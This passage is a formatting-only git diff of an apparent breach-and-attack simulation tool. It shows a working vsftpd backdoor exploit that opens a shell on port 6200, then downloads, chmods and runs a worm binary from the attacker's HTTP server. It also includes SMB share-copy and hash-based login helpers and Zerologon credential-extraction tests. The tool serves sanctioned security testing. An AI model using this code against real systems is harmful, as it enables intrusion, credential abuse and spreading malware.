f"{USERS[i]}:{RIDS[i]}:::{LM_HASHES[i]}:{NT_HASHES[i]}:::" for i in range(len(USERS)) ] expected_extracted_creds = { USERS[0]: {"RID": int(RIDS[0]), "lm_hash": "", "nt_hash": ""}, USERS[1]: {"RID": int(RIDS[1]), "lm_hash": "", "nt_hash": ""}, } - assert ( - zerologon_exploiter_object._extract_user_creds_from_secrets(mock_dumped_secrets) - is None - ) + assert 
zerologon_exploiter_object._extract_user_creds_from_secrets(mock_dumped_secrets) is None assert zerologon_exploiter_object._extracted_creds == expected_extracted_creds diff --git a/monkey/infection_monkey/exploit/tests/zerologon_utils/test_vuln_assessment.py b/monkey/infection_monkey/exploit/tests/zerologon_utils/test_vuln_assessment.py index ca598ce7c..99ab690b4 100644 --- a/monkey/infection_monkey/exploit/tests/zerologon_utils/test_vuln_assessment.py +++ b/monkey/infection_monkey/exploit/tests/zerologon_utils/test_vuln_assessment.py @@ -2,8 +2,7 @@ import pytest from nmb.NetBIOS import NetBIOS from common.utils.exceptions import DomainControllerNameFetchError -from infection_monkey.exploit.zerologon_utils.vuln_assessment import \ - get_dc_details +from infection_monkey.exploit.zerologon_utils.vuln_assessment import get_dc_details from infection_monkey.model.host import VictimHost @@ -19,6 +18,7 @@ def host(): def _get_stub_queryIPForName(netbios_names): def stub_queryIPForName(*args, **kwargs): return netbios_names + return stub_queryIPForName diff --git a/monkey/infection_monkey/exploit/tools/helpers.py b/monkey/infection_monkey/exploit/tools/helpers.py index 901202d2d..cf94f6edc 100644 --- a/monkey/infection_monkey/exploit/tools/helpers.py +++ b/monkey/infection_monkey/exploit/tools/helpers.py @@ -19,19 +19,20 @@ def get_target_monkey(host): if host.monkey_exe: return host.monkey_exe - if not host.os.get('type'): + if not host.os.get("type"): return None monkey_path = ControlClient.download_monkey_exe(host) - if host.os.get('machine') and monkey_path: + if host.os.get("machine") and monkey_path: host.monkey_exe = monkey_path if not monkey_path: - if host.os.get('type') == platform.system().lower(): + if host.os.get("type") == platform.system().lower(): # if exe not found, and we have the same arch or arch is unknown and we are 32bit, use our exe - if (not host.os.get('machine') and sys.maxsize < 2 ** 32) or \ - host.os.get('machine', '').lower() == platform.machine().lower(): + if (not host.os.get("machine") and sys.maxsize < 2 ** 32) or host.os.get( + "machine", "" + ).lower() == platform.machine().lower(): monkey_path = sys.executable return monkey_path @@ -39,11 +40,13 @@ def get_target_monkey(host): def get_target_monkey_by_os(is_windows, is_32bit): from infection_monkey.control import ControlClient + return ControlClient.download_monkey_exe_by_os(is_windows, is_32bit) -def build_monkey_commandline_explicitly(parent=None, tunnel=None, server=None, depth=None, location=None, - vulnerable_port=None): +def build_monkey_commandline_explicitly( + parent=None, tunnel=None, server=None, depth=None, location=None, vulnerable_port=None +): cmdline = "" if parent is not None: @@ -66,12 +69,20 @@ def build_monkey_commandline_explicitly(parent=None, tunnel=None, server=None, d def build_monkey_commandline(target_host, depth, vulnerable_port, location=None): from infection_monkey.config import GUID + return build_monkey_commandline_explicitly( - GUID, target_host.default_tunnel, target_host.default_server, depth, location, vulnerable_port) + GUID, + target_host.default_tunnel, + target_host.default_server, + depth, + location, + vulnerable_port, + ) def get_monkey_depth(): from infection_monkey.config import WormConfiguration + return WormConfiguration.depth @@ -82,21 +93,26 @@ def get_monkey_dest_path(url_to_monkey): :return: Corresponding monkey path from configuration """ from infection_monkey.config import WormConfiguration - if not url_to_monkey or ('linux' not in url_to_monkey and 
'windows' not in url_to_monkey): + + if not url_to_monkey or ("linux" not in url_to_monkey and "windows" not in url_to_monkey): LOG.error("Can't get destination path because source path %s is invalid.", url_to_monkey) return False try: - if 'linux' in url_to_monkey: + if "linux" in url_to_monkey: return WormConfiguration.dropper_target_path_linux - elif 'windows-32' in url_to_monkey: + elif "windows-32" in url_to_monkey: return WormConfiguration.dropper_target_path_win_32 - elif 'windows-64' in url_to_monkey: + elif "windows-64" in url_to_monkey: return WormConfiguration.dropper_target_path_win_64 else: - LOG.error("Could not figure out what type of monkey server was trying to upload, " - "thus destination path can not be chosen.") + LOG.error( + "Could not figure out what type of monkey server was trying to upload, " + "thus destination path can not be chosen." + ) return False except AttributeError: - LOG.error("Seems like monkey's source configuration property names changed. " - "Can not get destination path to upload monkey") + LOG.error( + "Seems like monkey's source configuration property names changed. " + "Can not get destination path to upload monkey" + ) return False diff --git a/monkey/infection_monkey/exploit/tools/http_tools.py b/monkey/infection_monkey/exploit/tools/http_tools.py index 3857c2cc9..d186adbab 100644 --- a/monkey/infection_monkey/exploit/tools/http_tools.py +++ b/monkey/infection_monkey/exploit/tools/http_tools.py @@ -13,13 +13,12 @@ from infection_monkey.network.info import get_free_tcp_port from infection_monkey.network.tools import get_interface_to_target from infection_monkey.transport import HTTPServer, LockedHTTPServer -__author__ = 'itamar' +__author__ = "itamar" LOG = logging.getLogger(__name__) class HTTPTools(object): - @staticmethod def create_transfer(host, src_path, local_ip=None, local_port=None): if not local_port: @@ -35,11 +34,17 @@ class HTTPTools(object): httpd.daemon = True httpd.start() - return "http://%s:%s/%s" % (local_ip, local_port, urllib.parse.quote(os.path.basename(src_path))), httpd + return ( + "http://%s:%s/%s" + % (local_ip, local_port, urllib.parse.quote(os.path.basename(src_path))), + httpd, + ) @staticmethod def try_create_locked_transfer(host, src_path, local_ip=None, local_port=None): - http_path, http_thread = HTTPTools.create_locked_transfer(host, src_path, local_ip, local_port) + http_path, http_thread = HTTPTools.create_locked_transfer( + host, src_path, local_ip, local_port + ) if not http_path: raise Exception("Http transfer creation failed.") LOG.info("Started http server on %s", http_path) @@ -71,7 +76,11 @@ class HTTPTools(object): httpd = LockedHTTPServer(local_ip, local_port, src_path, lock) httpd.start() lock.acquire() - return "http://%s:%s/%s" % (local_ip, local_port, urllib.parse.quote(os.path.basename(src_path))), httpd + return ( + "http://%s:%s/%s" + % (local_ip, local_port, urllib.parse.quote(os.path.basename(src_path))), + httpd, + ) @staticmethod def get_port_from_url(url: str) -> int: @@ -88,7 +97,9 @@ class MonkeyHTTPServer(HTTPTools): def start(self): # Get monkey exe for host and it's path src_path = try_get_target_monkey(self.host) - self.http_path, self.http_thread = MonkeyHTTPServer.try_create_locked_transfer(self.host, src_path) + self.http_path, self.http_thread = MonkeyHTTPServer.try_create_locked_transfer( + self.host, src_path + ) def stop(self): if not self.http_path or not self.http_thread: diff --git a/monkey/infection_monkey/exploit/tools/payload_parsing.py 
b/monkey/infection_monkey/exploit/tools/payload_parsing.py index 5c4415fe3..052ab18e5 100644 --- a/monkey/infection_monkey/exploit/tools/payload_parsing.py +++ b/monkey/infection_monkey/exploit/tools/payload_parsing.py @@ -45,15 +45,17 @@ class LimitedSizePayload(Payload): def split_into_array_of_smaller_payloads(self): if self.is_suffix_and_prefix_too_long(): - raise Exception("Can't split command into smaller sub-commands because commands' prefix and suffix already " - "exceeds required length of command.") + raise Exception( + "Can't split command into smaller sub-commands because commands' prefix and suffix already " + "exceeds required length of command." + ) elif self.command == "": return [self.prefix + self.suffix] - wrapper = textwrap.TextWrapper(drop_whitespace=False, width=self.get_max_sub_payload_length()) - commands = [self.get_payload(part) - for part - in wrapper.wrap(self.command)] + wrapper = textwrap.TextWrapper( + drop_whitespace=False, width=self.get_max_sub_payload_length() + ) + commands = [self.get_payload(part) for part in wrapper.wrap(self.command)] return commands def get_max_sub_payload_length(self): diff --git a/monkey/infection_monkey/exploit/tools/payload_parsing_test.py b/monkey/infection_monkey/exploit/tools/payload_parsing_test.py index 2aaa6dc12..18dcf6df2 100644 --- a/monkey/infection_monkey/exploit/tools/payload_parsing_test.py +++ b/monkey/infection_monkey/exploit/tools/payload_parsing_test.py @@ -13,20 +13,26 @@ class TestPayload(TestCase): def test_is_suffix_and_prefix_too_long(self): pld_fail = LimitedSizePayload("b", 2, "a", "c") pld_success = LimitedSizePayload("b", 3, "a", "c") - assert pld_fail.is_suffix_and_prefix_too_long() and not pld_success.is_suffix_and_prefix_too_long() + assert ( + pld_fail.is_suffix_and_prefix_too_long() + and not pld_success.is_suffix_and_prefix_too_long() + ) def test_split_into_array_of_smaller_payloads(self): test_str1 = "123456789" pld1 = LimitedSizePayload(test_str1, max_length=16, prefix="prefix", suffix="suffix") array1 = pld1.split_into_array_of_smaller_payloads() - test1 = bool(array1[0] == "prefix1234suffix" and - array1[1] == "prefix5678suffix" and - array1[2] == "prefix9suffix") + test1 = bool( + array1[0] == "prefix1234suffix" + and array1[1] == "prefix5678suffix" + and array1[2] == "prefix9suffix" + ) test_str2 = "12345678" pld2 = LimitedSizePayload(test_str2, max_length=16, prefix="prefix", suffix="suffix") array2 = pld2.split_into_array_of_smaller_payloads() - test2 = bool(array2[0] == "prefix1234suffix" and - array2[1] == "prefix5678suffix" and len(array2) == 2) + test2 = bool( + array2[0] == "prefix1234suffix" and array2[1] == "prefix5678suffix" and len(array2) == 2 + ) assert test1 and test2 diff --git a/monkey/infection_monkey/exploit/tools/smb_tools.py b/monkey/infection_monkey/exploit/tools/smb_tools.py index 705f691e5..9943b4135 100644 --- a/monkey/infection_monkey/exploit/tools/smb_tools.py +++ b/monkey/infection_monkey/exploit/tools/smb_tools.py @@ -13,32 +13,37 @@ from infection_monkey.config import Configuration from infection_monkey.network.tools import get_interface_to_target from infection_monkey.telemetry.attack.t1105_telem import T1105Telem -__author__ = 'itamar' +__author__ = "itamar" LOG = logging.getLogger(__name__) class SmbTools(object): - @staticmethod - def copy_file(host, src_path, dst_path, username, password, lm_hash='', ntlm_hash='', timeout=60): + def copy_file( + host, src_path, dst_path, username, password, lm_hash="", ntlm_hash="", timeout=60 + ): assert 
monkeyfs.isfile(src_path), "Source file to copy (%s) is missing" % (src_path,) config = infection_monkey.config.WormConfiguration src_file_size = monkeyfs.getsize(src_path) - smb, dialect = SmbTools.new_smb_connection(host, username, password, lm_hash, ntlm_hash, timeout) + smb, dialect = SmbTools.new_smb_connection( + host, username, password, lm_hash, ntlm_hash, timeout + ) if not smb: return None # skip guest users if smb.isGuestSession() > 0: - LOG.debug("Connection to %r granted guest privileges with user: %s, password (SHA-512): '%s'," - " LM hash (SHA-512): %s, NTLM hash (SHA-512): %s", - host, - username, - Configuration.hash_sensitive_data(password), - Configuration.hash_sensitive_data(lm_hash), - Configuration.hash_sensitive_data(ntlm_hash)) + LOG.debug( + "Connection to %r granted guest privileges with user: %s, password (SHA-512): '%s'," + " LM hash (SHA-512): %s, NTLM hash (SHA-512): %s", + host, + username, + Configuration.hash_sensitive_data(password), + Configuration.hash_sensitive_data(lm_hash), + Configuration.hash_sensitive_data(ntlm_hash), + ) try: smb.logoff() @@ -50,53 +55,57 @@ class SmbTools(object): try: resp = SmbTools.execute_rpc_call(smb, "hNetrServerGetInfo", 102) except Exception as exc: - LOG.debug("Error requesting server info from %r over SMB: %s", - host, exc) + LOG.debug("Error requesting server info from %r over SMB: %s", host, exc) return None - info = {'major_version': resp['InfoStruct']['ServerInfo102']['sv102_version_major'], - 'minor_version': resp['InfoStruct']['ServerInfo102']['sv102_version_minor'], - 'server_name': resp['InfoStruct']['ServerInfo102']['sv102_name'].strip("\0 "), - 'server_comment': resp['InfoStruct']['ServerInfo102']['sv102_comment'].strip("\0 "), - 'server_user_path': resp['InfoStruct']['ServerInfo102']['sv102_userpath'].strip("\0 "), - 'simultaneous_users': resp['InfoStruct']['ServerInfo102']['sv102_users']} + info = { + "major_version": resp["InfoStruct"]["ServerInfo102"]["sv102_version_major"], + "minor_version": resp["InfoStruct"]["ServerInfo102"]["sv102_version_minor"], + "server_name": resp["InfoStruct"]["ServerInfo102"]["sv102_name"].strip("\0 "), + "server_comment": resp["InfoStruct"]["ServerInfo102"]["sv102_comment"].strip("\0 "), + "server_user_path": resp["InfoStruct"]["ServerInfo102"]["sv102_userpath"].strip("\0 "), + "simultaneous_users": resp["InfoStruct"]["ServerInfo102"]["sv102_users"], + } - LOG.debug("Connected to %r using %s:\n%s", - host, dialect, pprint.pformat(info)) + LOG.debug("Connected to %r using %s:\n%s", host, dialect, pprint.pformat(info)) try: resp = SmbTools.execute_rpc_call(smb, "hNetrShareEnum", 2) except Exception as exc: - LOG.debug("Error enumerating server shares from %r over SMB: %s", - host, exc) + LOG.debug("Error enumerating server shares from %r over SMB: %s", host, exc) return None - resp = resp['InfoStruct']['ShareInfo']['Level2']['Buffer'] + resp = resp["InfoStruct"]["ShareInfo"]["Level2"]["Buffer"] high_priority_shares = () low_priority_shares = () file_name = ntpath.split(dst_path)[-1] for i in range(len(resp)): - share_name = resp[i]['shi2_netname'].strip("\0 ") - share_path = resp[i]['shi2_path'].strip("\0 ") - current_uses = resp[i]['shi2_current_uses'] - max_uses = resp[i]['shi2_max_uses'] + share_name = resp[i]["shi2_netname"].strip("\0 ") + share_path = resp[i]["shi2_path"].strip("\0 ") + current_uses = resp[i]["shi2_current_uses"] + max_uses = resp[i]["shi2_max_uses"] if current_uses >= max_uses: - LOG.debug("Skipping share '%s' on victim %r because max uses is exceeded", - 
share_name, host) + LOG.debug( + "Skipping share '%s' on victim %r because max uses is exceeded", + share_name, + host, + ) continue elif not share_path: - LOG.debug("Skipping share '%s' on victim %r because share path is invalid", - share_name, host) + LOG.debug( + "Skipping share '%s' on victim %r because share path is invalid", + share_name, + host, + ) continue - share_info = {'share_name': share_name, - 'share_path': share_path} + share_info = {"share_name": share_name, "share_path": share_path} if dst_path.lower().startswith(share_path.lower()): - high_priority_shares += ((ntpath.sep + dst_path[len(share_path):], share_info),) + high_priority_shares += ((ntpath.sep + dst_path[len(share_path) :], share_info),) low_priority_shares += ((ntpath.sep + file_name, share_info),) @@ -104,23 +113,31 @@ class SmbTools(object): file_uploaded = False for remote_path, share in shares: - share_name = share['share_name'] - share_path = share['share_path'] + share_name = share["share_name"] + share_path = share["share_path"] if not smb: - smb, _ = SmbTools.new_smb_connection(host, username, password, lm_hash, ntlm_hash, timeout) + smb, _ = SmbTools.new_smb_connection( + host, username, password, lm_hash, ntlm_hash, timeout + ) if not smb: return None try: smb.connectTree(share_name) except Exception as exc: - LOG.debug("Error connecting tree to share '%s' on victim %r: %s", - share_name, host, exc) + LOG.debug( + "Error connecting tree to share '%s' on victim %r: %s", share_name, host, exc + ) continue - LOG.debug("Trying to copy monkey file to share '%s' [%s + %s] on victim %r", - share_name, share_path, remote_path, host.ip_addr[0], ) + LOG.debug( + "Trying to copy monkey file to share '%s' [%s + %s] on victim %r", + share_name, + share_path, + remote_path, + host.ip_addr[0], + ) remote_full_path = ntpath.join(share_path, remote_path.strip(ntpath.sep)) @@ -133,32 +150,41 @@ class SmbTools(object): LOG.debug("Remote monkey file is same as source, skipping copy") return remote_full_path - LOG.debug("Remote monkey file is found but different, moving along with attack") + LOG.debug( + "Remote monkey file is found but different, moving along with attack" + ) except Exception: pass # file isn't found on remote victim, moving on try: - with monkeyfs.open(src_path, 'rb') as source_file: + with monkeyfs.open(src_path, "rb") as source_file: # make sure of the timeout smb.setTimeout(timeout) smb.putFile(share_name, remote_path, source_file.read) file_uploaded = True - T1105Telem(ScanStatus.USED, - get_interface_to_target(host.ip_addr), - host.ip_addr, - dst_path).send() - LOG.info("Copied monkey file '%s' to remote share '%s' [%s] on victim %r", - src_path, share_name, share_path, host) + T1105Telem( + ScanStatus.USED, get_interface_to_target(host.ip_addr), host.ip_addr, dst_path + ).send() + LOG.info( + "Copied monkey file '%s' to remote share '%s' [%s] on victim %r", + src_path, + share_name, + share_path, + host, + ) break except Exception as exc: - LOG.debug("Error uploading monkey to share '%s' on victim %r: %s", - share_name, host, exc) - T1105Telem(ScanStatus.SCANNED, - get_interface_to_target(host.ip_addr), - host.ip_addr, - dst_path).send() + LOG.debug( + "Error uploading monkey to share '%s' on victim %r: %s", share_name, host, exc + ) + T1105Telem( + ScanStatus.SCANNED, + get_interface_to_target(host.ip_addr), + host.ip_addr, + dst_path, + ).send() continue finally: try: @@ -169,39 +195,41 @@ class SmbTools(object): smb = None if not file_uploaded: - LOG.debug("Couldn't find a writable share for 
exploiting victim %r with " - "username: %s, password (SHA-512): '%s', LM hash (SHA-512): %s, NTLM hash (SHA-512): %s", - host, - username, - Configuration.hash_sensitive_data(password), - Configuration.hash_sensitive_data(lm_hash), - Configuration.hash_sensitive_data(ntlm_hash)) + LOG.debug( + "Couldn't find a writable share for exploiting victim %r with " + "username: %s, password (SHA-512): '%s', LM hash (SHA-512): %s, NTLM hash (SHA-512): %s", + host, + username, + Configuration.hash_sensitive_data(password), + Configuration.hash_sensitive_data(lm_hash), + Configuration.hash_sensitive_data(ntlm_hash), + ) return None return remote_full_path @staticmethod - def new_smb_connection(host, username, password, lm_hash='', ntlm_hash='', timeout=60): + def new_smb_connection(host, username, password, lm_hash="", ntlm_hash="", timeout=60): try: smb = SMBConnection(host.ip_addr, host.ip_addr, sess_port=445) except Exception as exc: - LOG.debug("SMB connection to %r on port 445 failed," - " trying port 139 (%s)", host, exc) + LOG.debug("SMB connection to %r on port 445 failed," " trying port 139 (%s)", host, exc) try: - smb = SMBConnection('*SMBSERVER', host.ip_addr, sess_port=139) + smb = SMBConnection("*SMBSERVER", host.ip_addr, sess_port=139) except Exception as exc: - LOG.debug("SMB connection to %r on port 139 failed as well (%s)", - host, exc) + LOG.debug("SMB connection to %r on port 139 failed as well (%s)", host, exc) return None, None - dialect = {SMB_DIALECT: "SMBv1", - SMB2_DIALECT_002: "SMBv2.0", - SMB2_DIALECT_21: "SMBv2.1"}.get(smb.getDialect(), "SMBv3.0") + dialect = { + SMB_DIALECT: "SMBv1", + SMB2_DIALECT_002: "SMBv2.0", + SMB2_DIALECT_21: "SMBv2.1", + }.get(smb.getDialect(), "SMBv3.0") # we know this should work because the WMI connection worked try: - smb.login(username, password, '', lm_hash, ntlm_hash) + smb.login(username, password, "", lm_hash, ntlm_hash) except Exception as exc: LOG.debug( "Error while logging into %r using user: %s, password (SHA-512): '%s', " @@ -211,7 +239,8 @@ class SmbTools(object): Configuration.hash_sensitive_data(password), Configuration.hash_sensitive_data(lm_hash), Configuration.hash_sensitive_data(ntlm_hash), - exc) + exc, + ) return None, dialect smb.setTimeout(timeout) @@ -228,10 +257,9 @@ class SmbTools(object): @staticmethod def get_dce_bind(smb): - rpctransport = transport.SMBTransport(smb.getRemoteHost(), - smb.getRemoteHost(), - filename=r'\srvsvc', - smb_connection=smb) + rpctransport = transport.SMBTransport( + smb.getRemoteHost(), smb.getRemoteHost(), filename=r"\srvsvc", smb_connection=smb + ) dce = rpctransport.get_dce_rpc() dce.connect() dce.bind(srvs.MSRPC_UUID_SRVS) diff --git a/monkey/infection_monkey/exploit/tools/test_helpers.py b/monkey/infection_monkey/exploit/tools/test_helpers.py index 5d7dd422d..60cc136e5 100644 --- a/monkey/infection_monkey/exploit/tools/test_helpers.py +++ b/monkey/infection_monkey/exploit/tools/test_helpers.py @@ -4,25 +4,20 @@ from infection_monkey.exploit.tools.helpers import build_monkey_commandline_expl class TestHelpers(unittest.TestCase): - def test_build_monkey_commandline_explicitly(self): test1 = " -p 101010 -t 10.10.101.10 -s 127.127.127.127:5000 -d 0 -l C:\\windows\\abc -vp 80" - result1 = build_monkey_commandline_explicitly(101010, - "10.10.101.10", - "127.127.127.127:5000", - 0, - "C:\\windows\\abc", - 80) + result1 = build_monkey_commandline_explicitly( + 101010, "10.10.101.10", "127.127.127.127:5000", 0, "C:\\windows\\abc", 80 + ) test2 = " -p parent -s 127.127.127.127:5000 -d 0 -vp 80" 
- result2 = build_monkey_commandline_explicitly(parent="parent", - server="127.127.127.127:5000", - depth="0", - vulnerable_port="80") + result2 = build_monkey_commandline_explicitly( + parent="parent", server="127.127.127.127:5000", depth="0", vulnerable_port="80" + ) self.assertEqual(test1, result1) self.assertEqual(test2, result2) -if __name__ == '__main__': +if __name__ == "__main__": unittest.main() diff --git a/monkey/infection_monkey/exploit/tools/wmi_tools.py b/monkey/infection_monkey/exploit/tools/wmi_tools.py index f62190076..b6d96aa82 100644 --- a/monkey/infection_monkey/exploit/tools/wmi_tools.py +++ b/monkey/infection_monkey/exploit/tools/wmi_tools.py @@ -5,7 +5,7 @@ from impacket.dcerpc.v5.dcom.wmi import DCERPCSessionError from impacket.dcerpc.v5.dcomrt import DCOMConnection from impacket.dcerpc.v5.dtypes import NULL -__author__ = 'itamar' +__author__ = "itamar" LOG = logging.getLogger(__name__) @@ -16,8 +16,10 @@ class DceRpcException(Exception): class AccessDeniedException(Exception): def __init__(self, host, username, password, domain): - super(AccessDeniedException, self).__init__("Access is denied to %r with username %s\\%s and password %r" % - (host, domain, username, password)) + super(AccessDeniedException, self).__init__( + "Access is denied to %r with username %s\\%s and password %r" + % (host, domain, username, password) + ) class WmiTools(object): @@ -34,17 +36,20 @@ class WmiTools(object): if not domain: domain = host.ip_addr - dcom = DCOMConnection(host.ip_addr, - username=username, - password=password, - domain=domain, - lmhash=lmhash, - nthash=nthash, - oxidResolver=True) + dcom = DCOMConnection( + host.ip_addr, + username=username, + password=password, + domain=domain, + lmhash=lmhash, + nthash=nthash, + oxidResolver=True, + ) try: - iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login, - wmi.IID_IWbemLevel1Login) + iInterface = dcom.CoCreateInstanceEx( + wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login + ) except Exception as exc: dcom.disconnect() @@ -56,7 +61,7 @@ class WmiTools(object): iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface) try: - self._iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL) + self._iWbemServices = iWbemLevel1Login.NTLMLogin("//./root/cimv2", NULL, NULL) self._dcom = dcom except Exception: dcom.disconnect() @@ -128,7 +133,7 @@ class WmiTools(object): try: while True: try: - next_item = iEnumWbemClassObject.Next(0xffffffff, 1)[0] + next_item = iEnumWbemClassObject.Next(0xFFFFFFFF, 1)[0] record = next_item.getProperties() if not fields: @@ -136,7 +141,7 @@ class WmiTools(object): query_record = {} for key in fields: - query_record[key] = record[key]['value'] + query_record[key] = record[key]["value"] query.append(query_record) except DCERPCSessionError as exc: diff --git a/monkey/infection_monkey/exploit/vsftpd.py b/monkey/infection_monkey/exploit/vsftpd.py index f2e355802..d8e88b44c 100644 --- a/monkey/infection_monkey/exploit/vsftpd.py +++ b/monkey/infection_monkey/exploit/vsftpd.py @@ -10,14 +10,24 @@ from logging import getLogger from common.utils.attack_utils import ScanStatus from infection_monkey.exploit.HostExploiter import HostExploiter -from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_monkey_depth, get_target_monkey +from infection_monkey.exploit.tools.helpers import ( + build_monkey_commandline, + get_monkey_depth, + get_target_monkey, +) from infection_monkey.exploit.tools.http_tools import HTTPTools -from infection_monkey.model import CHMOD_MONKEY, 
DOWNLOAD_TIMEOUT, MONKEY_ARG, RUN_MONKEY, WGET_HTTP_UPLOAD +from infection_monkey.model import ( + CHMOD_MONKEY, + DOWNLOAD_TIMEOUT, + MONKEY_ARG, + RUN_MONKEY, + WGET_HTTP_UPLOAD, +) from infection_monkey.telemetry.attack.t1222_telem import T1222Telem LOG = getLogger(__name__) -__author__ = 'D3fa1t' +__author__ = "D3fa1t" FTP_PORT = 21 # port at which vsftpd runs BACKDOOR_PORT = 6200 # backdoor port @@ -25,14 +35,14 @@ RECV_128 = 128 # In Bytes UNAME_M = "uname -m" ULIMIT_V = "ulimit -v " # To increase the memory limit UNLIMITED = "unlimited;" -USERNAME = b'USER D3fa1t:)' # Ftp Username should end with :) to trigger the backdoor -PASSWORD = b'PASS please' # Ftp Password +USERNAME = b"USER D3fa1t:)" # Ftp Username should end with :) to trigger the backdoor +PASSWORD = b"PASS please" # Ftp Password FTP_TIME_BUFFER = 1 # In seconds class VSFTPDExploiter(HostExploiter): - _TARGET_OS_TYPE = ['linux'] - _EXPLOITED_SERVICE = 'VSFTPD' + _TARGET_OS_TYPE = ["linux"] + _EXPLOITED_SERVICE = "VSFTPD" def __init__(self, host): self._update_timestamp = 0 @@ -44,15 +54,15 @@ class VSFTPDExploiter(HostExploiter): s.connect((ip_addr, port)) return True except socket.error as e: - LOG.info('Failed to connect to %s: %s', self.host.ip_addr, str(e)) + LOG.info("Failed to connect to %s: %s", self.host.ip_addr, str(e)) return False def socket_send_recv(self, s, message): try: s.send(message) - return s.recv(RECV_128).decode('utf-8') + return s.recv(RECV_128).decode("utf-8") except socket.error as e: - LOG.info('Failed to send payload to %s: %s', self.host.ip_addr, str(e)) + LOG.info("Failed to send payload to %s: %s", self.host.ip_addr, str(e)) return False def socket_send(self, s, message): @@ -60,7 +70,7 @@ class VSFTPDExploiter(HostExploiter): s.send(message) return True except socket.error as e: - LOG.info('Failed to send payload to %s: %s', self.host.ip_addr, str(e)) + LOG.info("Failed to send payload to %s: %s", self.host.ip_addr, str(e)) return False def _exploit_host(self): @@ -68,32 +78,32 @@ class VSFTPDExploiter(HostExploiter): ftp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) if self.socket_connect(ftp_socket, self.host.ip_addr, FTP_PORT): - ftp_socket.recv(RECV_128).decode('utf-8') + ftp_socket.recv(RECV_128).decode("utf-8") - if self.socket_send_recv(ftp_socket, USERNAME + b'\n'): + if self.socket_send_recv(ftp_socket, USERNAME + b"\n"): time.sleep(FTP_TIME_BUFFER) - self.socket_send(ftp_socket, PASSWORD + b'\n') + self.socket_send(ftp_socket, PASSWORD + b"\n") ftp_socket.close() - LOG.info('Backdoor Enabled, Now we can run commands') + LOG.info("Backdoor Enabled, Now we can run commands") else: - LOG.error('Failed to trigger backdoor on %s', self.host.ip_addr) + LOG.error("Failed to trigger backdoor on %s", self.host.ip_addr) return False - LOG.info('Attempting to connect to backdoor...') + LOG.info("Attempting to connect to backdoor...") backdoor_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) if self.socket_connect(backdoor_socket, self.host.ip_addr, BACKDOOR_PORT): - LOG.info('Connected to backdoor on %s:6200', self.host.ip_addr) + LOG.info("Connected to backdoor on %s:6200", self.host.ip_addr) - uname_m = str.encode(UNAME_M + '\n') + uname_m = str.encode(UNAME_M + "\n") response = self.socket_send_recv(backdoor_socket, uname_m) if response: - LOG.info('Response for uname -m: %s', response) - if '' != response.lower().strip(): + LOG.info("Response for uname -m: %s", response) + if "" != response.lower().strip(): # command execution is successful - self.host.os['machine'] 
= response.lower().strip() - self.host.os['type'] = 'linux' + self.host.os["machine"] = response.lower().strip() + self.host.os["type"] = "linux" else: LOG.info("Failed to execute command uname -m on victim %r ", self.host) @@ -111,39 +121,47 @@ class VSFTPDExploiter(HostExploiter): # Upload the monkey to the machine monkey_path = dropper_target_path_linux - download_command = WGET_HTTP_UPLOAD % {'monkey_path': monkey_path, 'http_path': http_path} - download_command = str.encode(str(download_command) + '\n') + download_command = WGET_HTTP_UPLOAD % {"monkey_path": monkey_path, "http_path": http_path} + download_command = str.encode(str(download_command) + "\n") LOG.info("Download command is %s", download_command) if self.socket_send(backdoor_socket, download_command): - LOG.info('Monkey is now Downloaded ') + LOG.info("Monkey is now Downloaded ") else: - LOG.error('Failed to download monkey at %s', self.host.ip_addr) + LOG.error("Failed to download monkey at %s", self.host.ip_addr) return False http_thread.join(DOWNLOAD_TIMEOUT) http_thread.stop() # Change permissions - change_permission = CHMOD_MONKEY % {'monkey_path': monkey_path} - change_permission = str.encode(str(change_permission) + '\n') + change_permission = CHMOD_MONKEY % {"monkey_path": monkey_path} + change_permission = str.encode(str(change_permission) + "\n") LOG.info("change_permission command is %s", change_permission) backdoor_socket.send(change_permission) T1222Telem(ScanStatus.USED, change_permission.decode(), self.host).send() # Run monkey on the machine - parameters = build_monkey_commandline(self.host, - get_monkey_depth() - 1, - vulnerable_port=FTP_PORT) - run_monkey = RUN_MONKEY % {'monkey_path': monkey_path, 'monkey_type': MONKEY_ARG, 'parameters': parameters} + parameters = build_monkey_commandline( + self.host, get_monkey_depth() - 1, vulnerable_port=FTP_PORT + ) + run_monkey = RUN_MONKEY % { + "monkey_path": monkey_path, + "monkey_type": MONKEY_ARG, + "parameters": parameters, + } # Set unlimited to memory # we don't have to revert the ulimit because it just applies to the shell obtained by our exploit run_monkey = ULIMIT_V + UNLIMITED + run_monkey - run_monkey = str.encode(str(run_monkey) + '\n') + run_monkey = str.encode(str(run_monkey) + "\n") time.sleep(FTP_TIME_BUFFER) if backdoor_socket.send(run_monkey): - LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)", self._config.dropper_target_path_linux, - self.host, run_monkey) + LOG.info( + "Executed monkey '%s' on remote victim %r (cmdline=%r)", + self._config.dropper_target_path_linux, + self.host, + run_monkey, + ) self.add_executed_cmd(run_monkey.decode()) return True else: diff --git a/monkey/infection_monkey/exploit/web_rce.py b/monkey/infection_monkey/exploit/web_rce.py index 069cbcada..f51fe1539 100644 --- a/monkey/infection_monkey/exploit/web_rce.py +++ b/monkey/infection_monkey/exploit/web_rce.py @@ -5,16 +5,31 @@ from posixpath import join from common.utils.attack_utils import BITS_UPLOAD_STRING, ScanStatus from infection_monkey.exploit.HostExploiter import HostExploiter -from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_monkey_depth, get_target_monkey +from infection_monkey.exploit.tools.helpers import ( + build_monkey_commandline, + get_monkey_depth, + get_target_monkey, +) from infection_monkey.exploit.tools.http_tools import HTTPTools -from infection_monkey.model import (BITSADMIN_CMDLINE_HTTP, CHECK_COMMAND, CHMOD_MONKEY, DOWNLOAD_TIMEOUT, DROPPER_ARG, - GET_ARCH_LINUX, GET_ARCH_WINDOWS, ID_STRING, 
